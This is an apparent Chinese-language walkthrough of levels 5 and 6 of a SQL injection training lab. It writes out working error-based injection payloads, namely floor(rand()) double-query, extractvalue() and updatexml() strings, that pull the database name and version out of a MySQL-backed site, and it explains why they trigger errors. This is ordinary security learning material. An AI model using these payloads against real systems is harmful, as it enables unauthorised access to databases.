第5关
输入?id=1
以前四关的思路
单引号报错,双单引号正常,证明存在注入点
order by 3-- - 正常 order by 4-- - 报错,字段数为3
再用select 1, 2, 3 发现无回显点
所以第五关得用到报错注入
根据标题可以用到双重查询
?id=1’ union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a-- -
rand() 生成[0,1)的随机数
floor() 向下取整
count(*) 统计
a 别名
大致的原理流程是:
rand()*2将[0,1)的随机数乘2变为[0,2)的随机数,再通过floor()向下取整改为0或1
group by会使数据库建立一个虚拟表并将这些0或1录入,同时将重复的内容归类成了两类,并作为主键, count(*)则对他们进行计数。
在记录数据时,会查询虚拟表中是否存在该主键,若不存在则插入。
因为插入时的结果可能有同样的值,这将导致主键冲突从而引发报错。
因为是随机数,所以导致了有时报错有时正常的情况。
这篇文章较详细的介绍了原理
https://www.cnblogs.com/laoxiajiadeyun/p/10283251.html
?id=1’and (select 1 from (select count(*),concat(database(),version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
这条语句同样是floor()语句但是会必报错,去除了随机性,应该是由于三条记录的原因,如以下链接:
https://www.cnblogs.com/xdans/p/5412468.html
第二种办法
通过Extractvalue() 或UpdateXml()来实现报错
?id=1’ and (extractvalue(‘anything’,concat(‘~’,(select database()))))-- -
?id=1’ union select username from security.user where id=1 and (updatexml(‘anything’,concat(‘~’,(select database())),’anything’))-- -
大致就是格式不符,语句无法正常读取
原理如下:
https://blog.csdn.net/zpy1998zpy/article/details/80631036
第六关:
同上,单引号换成双引号
源码:
第五关
第六关
可见单双引号的区别